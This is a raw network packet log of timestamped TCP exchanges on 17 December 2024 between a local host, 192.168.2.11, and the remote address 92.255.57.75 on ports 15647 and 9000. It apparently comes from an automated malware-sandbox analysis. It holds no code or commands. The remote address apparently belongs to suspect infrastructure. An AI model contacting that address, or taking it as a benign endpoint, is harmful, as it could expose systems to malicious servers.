Dec 17, 2024 08:40:29.497250080 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.497845888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.499850035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.507812977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.511884928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.541023016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.541228056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.541409969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.557519913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.557529926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.557601929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.591914892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.597613096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.599776983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.599838972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.617711067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.619901896 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.619999886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.622608900 CET	9000	50056	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.622626066 CET	9000	50056	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.622720003 CET	50056	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.622801065 CET	50056	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.655208111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.660948038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.662230015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.663570881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.667795897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.671825886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.671835899 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.671840906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.671869993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.671895981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.699793100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.701399088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.712208033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.715852022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.731528044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.734777927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.735022068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.735116005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.737605095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.745770931 CET	9000	50056	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.758343935 CET	50057	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.775064945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.775865078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.780087948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.780167103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.780260086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.788633108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.788644075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.788728952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.822535992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.823862076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.835658073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.835855961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.851355076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.851855993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.853050947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.860065937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.863857985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.879825115 CET	9000	50057	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.883848906 CET	50057	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.901045084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.907835007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.913089037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.913098097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.913157940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.916369915 CET	50057	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.935348988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.935462952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.935565948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.955665112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.955760956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.967392921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.967878103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.992417097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.027867079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.027879000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.027987957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.037075043 CET	9000	50057	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.043824911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.076781034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.088928938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.091860056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.100338936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.100555897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.100641966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.102900028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.135859966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.138189077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.138200998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.138307095 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.147815943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.165766001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.166841984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.172687054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.172698975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.172755957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.174964905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.175034046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.218502998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.218553066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.248790979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.248806000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.248929024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.280009031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.280136108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.292515993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.292567015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.321198940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.330317974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.330419064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.356389999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.381885052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.411415100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.443188906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.475552082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.478508949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.478598118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.482692957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.482702017 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.482723951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.482749939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.505551100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.527861118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.558192015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.581204891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.598400116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.598479986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.625761986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.650079966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.676973104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.678317070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678365946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678373098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678420067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678426981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678442001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678446054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.678467035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678472042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.678522110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678531885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678560972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.678610086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.701049089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.701159954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.718426943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.718584061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.718586922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.746906996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.746995926 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.758158922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.758317947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.758740902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.758801937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.758826971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.758869886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.770169973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.770250082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.787715912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.787781000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.796983957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.797102928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.817878008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.818106890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.821558952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.821614981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.822424889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.826320887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.826477051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.826486111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.839987993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.840135098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.862339020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.880157948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.881088972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.881246090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.884926081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.884979010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.885137081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.908365965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.908533096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.920279980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.920373917 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.920465946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.937243938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.941481113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.941845894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.946310997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.946366072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.946403027 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.962388992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.963392973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.982377052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.982458115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.995695114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.995749950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.995799065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:30.999768019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:30.999969006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.000029087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.012618065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.012689114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.032222986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.038892031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.038976908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.039130926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.057040930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.057209015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.060092926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.060338974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.067063093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.067135096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.067409992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.067599058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.085788965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.085870981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.110428095 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.114204884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.114320993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.119612932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.119683981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.119777918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.122353077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.122406006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.130321980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.130395889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.152496099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.152576923 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.156022072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.156115055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.156209946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.178736925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.179199934 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.185482025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.185605049 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.187803984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.187891006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.188297033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.209764957 CET	9000	50057	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.209825993 CET	9000	50057	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.209898949 CET	50057	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.210103035 CET	50057	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.218889952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.230189085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.233807087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.233877897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.233928919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.240232944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.250099897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.251513004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.273653030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.274024963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.276180983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.276247978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.276262999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.292601109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.305608034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.306508064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.311734915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.312747002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.312830925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.312860966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.314243078 CET	50058	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.329792976 CET	9000	50057	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.338859081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.340095043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.344531059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.346079111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.346647024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.346730947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.346764088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.346775055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.370951891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.371413946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.379945993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.381107092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.381148100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.381227016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.395951986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.397933006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.398164988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.402718067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.402761936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.402837992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.412436008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.415883064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.431775093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.432365894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.432414055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.432507992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.433949947 CET	9000	50058	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.434948921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.435034990 CET	50058	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.435144901 CET	50058	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.435147047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.456038952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.460094929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.461893082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.464545965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.464642048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.468240023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.470067978 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.471224070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.471303940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.471329927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.491354942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.491503000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.491627932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.497564077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.499861002 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.504405022 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.504468918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.504558086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.522629023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.523886919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.531102896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.534420013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.551415920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.551490068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.551651955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.553726912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.553811073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.554785967 CET	9000	50058	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.555078983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.555150032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.563415051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.566023111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.575967073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.584618092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.585832119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.585944891 CET	50034	15647	192.168.2.11	92.255.57.75
